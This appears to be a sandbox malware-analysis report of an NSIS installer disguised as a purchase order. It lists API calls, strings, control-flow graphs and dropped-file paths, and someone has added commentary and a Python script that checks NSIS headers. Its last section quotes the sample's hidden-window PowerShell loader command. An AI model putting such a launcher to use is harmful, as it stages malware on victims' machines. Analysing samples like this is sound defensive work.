                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                                • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004054C3
                                                                                              • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                              • ShowWindow.USER32(0001045E,00000008), ref: 004054EC
                                                                                              • ShowWindow.USER32(00000008), ref: 00405536
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                              • CreatePopupMenu.USER32 ref: 0040557B
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                              • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                              • EmptyClipboard.USER32 ref: 00405616
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                              • CloseClipboard.USER32 ref: 00405671
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                              • String ID: {
                                                                                              • API String ID: 4154960007-366298937
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph (rendered graph not recoverable from the report text)
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,?), ref: 00406135
                                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
                                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
                                                                                              • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,?), ref: 00406299
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 900638850-905382516
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph (rendered graph not recoverable from the report text)
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                              • lstrcatW.KERNEL32(0042F250,\*.*), ref: 004058B2
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 004058D5
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                              • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 00405841
                                                                                              • \*.*, xrefs: 004058AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                              • API String ID: 2035342205-1522382464
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(74DF3420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                              • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph (rendered graph not recoverable from the report text)
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C78
                                                                                              • ShowWindow.USER32(?), ref: 00403C95
                                                                                              • DestroyWindow.USER32 ref: 00403CA9
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CC5
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403CE6
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFA
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403D01
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403DAF
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403DB9
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD3
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E24
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403ECA
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403EEB
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EFD
                                                                                              • EnableWindow.USER32(?,?), ref: 00403F18
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F2E
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403F35
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F4D
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F60
                                                                                              • lstrlenW.KERNEL32(0042D248,?,0042D248,Podning Setup), ref: 00403F89
                                                                                              • SetWindowTextW.USER32(?,0042D248), ref: 00403F9D
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: Podning Setup
                                                                                              • API String ID: 3282139019-771305457
                                                                                              • Opcode ID: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                              • Instruction ID: 977002fee4e807fcea2a4689fe207fdbad8331f3a024ab3ce592dbd86d7f0908
                                                                                              • Opcode Fuzzy Hash: 4b72a46082cfccb0225a7e19ce14cf06edf6b5bf773da4775a24074ada9f3e72
                                                                                              • Instruction Fuzzy Hash: 2EC1D171504204BFDB216F61EE89E2B3A69FB88706F04053EF641B21F0CB799991DB6D
                                                                                               Uniqueness Score: -1.00%

                                                                                               Control-flow Graph
                                                                                              control_flow_graph 287 403899-4038b1 call 40642a 290 4038b3-4038c3 call 405f97 287->290 291 4038c5-4038fc call 405f1d 287->291 300 40391f-403948 call 403b6f call 405b0c 290->300 296 403914-40391a lstrcatW 291->296 297 4038fe-40390f call 405f1d 291->297 296->300 297->296 305 4039da-4039e2 call 405b0c 300->305 306 40394e-403953 300->306 312 4039f0-403a15 LoadImageW 305->312 313 4039e4-4039eb call 406072 305->313 306->305 308 403959-403981 call 405f1d 306->308 308->305 314 403983-403987 308->314 316 403a96-403a9e call 40140b 312->316 317 403a17-403a47 RegisterClassW 312->317 313->312 318 403999-4039a5 lstrlenW 314->318 319 403989-403996 call 405a31 314->319 330 403aa0-403aa3 316->330 331 403aa8-403ab3 call 403b6f 316->331 320 403b65 317->320 321 403a4d-403a91 SystemParametersInfoW CreateWindowExW 317->321 325 4039a7-4039b5 lstrcmpiW 318->325 326 4039cd-4039d5 call 405a04 call 406050 318->326 319->318 324 403b67-403b6e 320->324 321->316 325->326 329 4039b7-4039c1 GetFileAttributesW 325->329 326->305 333 4039c3-4039c5 329->333 334 4039c7-4039c8 call 405a50 329->334 330->324 340 403ab9-403ad3 ShowWindow call 4063ba 331->340 341 403b3c-403b3d call 405282 331->341 333->326 333->334 334->326 346 403ad5-403ada call 4063ba 340->346 347 403adf-403af1 GetClassInfoW 340->347 345 403b42-403b44 341->345 348 403b46-403b4c 345->348 349 403b5e-403b60 call 40140b 345->349 346->347 352 403af3-403b03 GetClassInfoW RegisterClassW 347->352 353 403b09-403b2c DialogBoxParamW call 40140b 347->353 348->330 354 403b52-403b59 call 40140b 348->354 349->320 352->353 358 403b31-403b3a call 4037e9 353->358 354->330 358->324
                                                                                              APIs
                                                                                                • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                              • lstrcatW.KERNEL32(1033,0042D248), ref: 0040391A
                                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,74DF3420), ref: 0040399A
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 004039AD
                                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 004039B8
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender), ref: 00403A01
                                                                                                • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                              • RegisterClassW.USER32(00433E80), ref: 00403A3E
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A56
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A8B
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403AC1
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403AED
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403AFA
                                                                                              • RegisterClassW.USER32(00433E80), ref: 00403B03
                                                                                              • DialogBoxParamW.USER32(?,00000000,00403C3C,00000000), ref: 00403B22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 1975747703-1043627570
                                                                                              • Opcode ID: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                              • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                              • Opcode Fuzzy Hash: 4a446d5dbccae23a406b5103979b1ab82b0e2a86200a0986eae4ccf8c8be16fa
                                                                                              • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D
                                                                                               Uniqueness Score: -1.00%

                                                                                               Control-flow Graph
                                                                                              control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 364 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 381 402f73-402f76 373->381 382 402fc6-402fcb 373->382 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 403242 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403258 call 403242 381->384 385 402f9a-402fc4 GlobalAlloc call 403258 call 403027 381->385 382->366 384->382 407 402f92-402f98 384->407 385->382 412 402fd7-402fe8 385->412 391 402eb4-402ec8 call 405be0 386->391 392 402f2e-402f32 386->392 387->382 397 402f3c-402f42 391->397 410 402eca-402ed1 391->410 396 402f34-402f3b call 402d8a 392->396 392->397 396->397 403 402f51-402f5b 397->403 404 402f44-402f4e call 4064db 397->404 403->376 411 402f61 403->411 404->403 407->382 407->385 410->397 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->397 418 402edc-402ee3 414->418 417 402ff6-402ffc 415->417 416->415 417->417 419 402ffe-403019 SetFilePointer call 405be0 417->419 418->397 420 402ee5-402eec 418->420 423 40301e 419->423 420->397 422 402eee-402f0e 420->422 422->382 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->397 427 402f2a-402f2c 425->427 426->411 426->425 427->397
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402E1B
                                                                                                • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C29
                                                                                                • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00405C4B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00403536,?), ref: 00402E67
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                                                              • "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe", xrefs: 00402DEE
                                                                                              • soft, xrefs: 00402EDC
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                              • Null, xrefs: 00402EE5
                                                                                              • Inst, xrefs: 00402ED3
                                                                                              • Error launching installer, xrefs: 00402E3E
                                                                                              • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 4283519449-2407772880
                                                                                              • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                              • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                              • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                              • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C
                                                                                               Uniqueness Score: -1.00%
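The function at 00402DEE is the NSIS stub's self-scan: it fetches its own path with GetModuleFileNameW, opens the file, reads GetFileSize and walks the image looking for the "Null", "soft" and "Inst" dwords that make up the NSIS first-header magic, then falls through to the "Installer integrity check has failed" message when the trailing CRC does not match. The Python below is an added triage example, not code from the report or from NSIS: it locates that first header in an installer image and re-runs the CRC check, using the NSIS first-header layout (flags, 0xDEADBEEF, "NullsoftInst", header length, total length) probed at 512-byte steps the way the stub does. The build_sample_installer helper and its 1 KiB dummy stub are constructed stand-ins for a real installer.

```python
import struct
import zlib

# NSIS firstheader (Source/exehead/fileform.h): flags, siginfo, 12-byte magic,
# length of the compressed header, length of everything that follows incl. this struct.
FIRSTHEADER_FMT = "<II12sII"
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)   # 28 bytes
NSIS_SIGINFO = 0xDEADBEEF
NSIS_MAGIC = b"NullsoftInst"     # the "Null", "soft", "Inst" dwords the stub compares
SCAN_STEP = 512                  # the stub probes the file at 512-byte intervals
FH_FLAGS_UNINSTALL, FH_FLAGS_SILENT, FH_FLAGS_NO_CRC, FH_FLAGS_FORCE_CRC = 1, 2, 4, 8


def find_nsis_firstheader(data: bytes):
    """Return (offset, flags, header_len, total_len) of the NSIS block, or None."""
    last = len(data) - FIRSTHEADER_SIZE
    for off in range(0, last + 1, SCAN_STEP):
        flags, sig, magic, hdr_len, total_len = struct.unpack_from(FIRSTHEADER_FMT, data, off)
        if sig != NSIS_SIGINFO or magic != NSIS_MAGIC:
            continue
        if off + total_len > len(data):   # claimed payload runs past EOF: not a valid header
            continue
        return off, flags, hdr_len, total_len
    return None


def nsis_integrity_ok(data: bytes) -> bool:
    """Re-run the check behind 'Installer integrity check has failed'.

    The stored CRC32 sits in the last 4 bytes of the NSIS block and covers every
    byte of the file before it, stub included. NO_CRC builds skip the check
    unless FORCE_CRC is also set.
    """
    found = find_nsis_firstheader(data)
    if found is None:
        return False
    off, flags, _hdr_len, total_len = found
    if flags & FH_FLAGS_NO_CRC and not flags & FH_FLAGS_FORCE_CRC:
        return True
    end = off + total_len
    stored = struct.unpack_from("<I", data, end - 4)[0]
    return zlib.crc32(data[: end - 4]) == stored


def build_sample_installer(payload: bytes, with_crc: bool = True) -> bytes:
    """Constructed stand-in for testing: a 1 KiB dummy stub followed by an NSIS block.

    Not real makensis output; the payload is opaque bytes rather than a compressed header.
    """
    stub = b"MZ" + b"\x00" * (1024 - 2)
    flags = 0 if with_crc else FH_FLAGS_NO_CRC
    total_len = FIRSTHEADER_SIZE + len(payload) + (4 if with_crc else 0)
    first = struct.pack(FIRSTHEADER_FMT, flags, NSIS_SIGINFO, NSIS_MAGIC, len(payload), total_len)
    image = stub + first + payload
    if with_crc:
        image += struct.pack("<I", zlib.crc32(image))
    return image


if __name__ == "__main__":
    img = build_sample_installer(b"\xAA" * 100)
    print(find_nsis_firstheader(img), nsis_integrity_ok(img))
```

On a real sample, read the dropped installer with open(path, "rb").read() and pass it to both functions; the offset returned is where the compressed NSIS header and the packed files begin, which is what an NSIS extractor needs, and a CRC mismatch on a file that still ran means the stub was patched or the flags rewritten.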

                                                                                               Control-flow Graph
                                                                                              control_flow_graph 554 401767-40178c call 402bbf call 405a7b 559 401796-4017a8 call 406050 call 405a04 lstrcatW 554->559 560 40178e-401794 call 406050 554->560 565 4017ad-4017ae call 4062e4 559->565 560->565 569 4017b3-4017b7 565->569 570 4017b9-4017c3 call 406393 569->570 571 4017ea-4017ed 569->571 579 4017d5-4017e7 570->579 580 4017c5-4017d3 CompareFileTime 570->580 572 4017f5-401811 call 405c25 571->572 573 4017ef-4017f0 call 405c00 571->573 581 401813-401816 572->581 582 401885-4018ae call 4051af call 403027 572->582 573->572 579->571 580->579 583 401867-401871 call 4051af 581->583 584 401818-401856 call 406050 * 2 call 406072 call 406050 call 405795 581->584 596 4018b0-4018b4 582->596 597 4018b6-4018c2 SetFileTime 582->597 594 40187a-401880 583->594 584->569 616 40185c-40185d 584->616 599 402a55 594->599 596->597 598 4018c8-4018d3 FindCloseChangeNotification 596->598 597->598 601 4018d9-4018dc 598->601 602 402a4c-402a4f 598->602 604 402a57-402a5b 599->604 605 4018f1-4018f4 call 406072 601->605 606 4018de-4018ef call 406072 lstrcatW 601->606 602->599 612 4018f9-40228d call 405795 605->612 606->612 612->602 612->604 616->594 618 40185f-401860 616->618 618->583
                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla,"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla,00000000,00000000,"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursuspla,C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten,?,?,00000031), ref: 004017CD
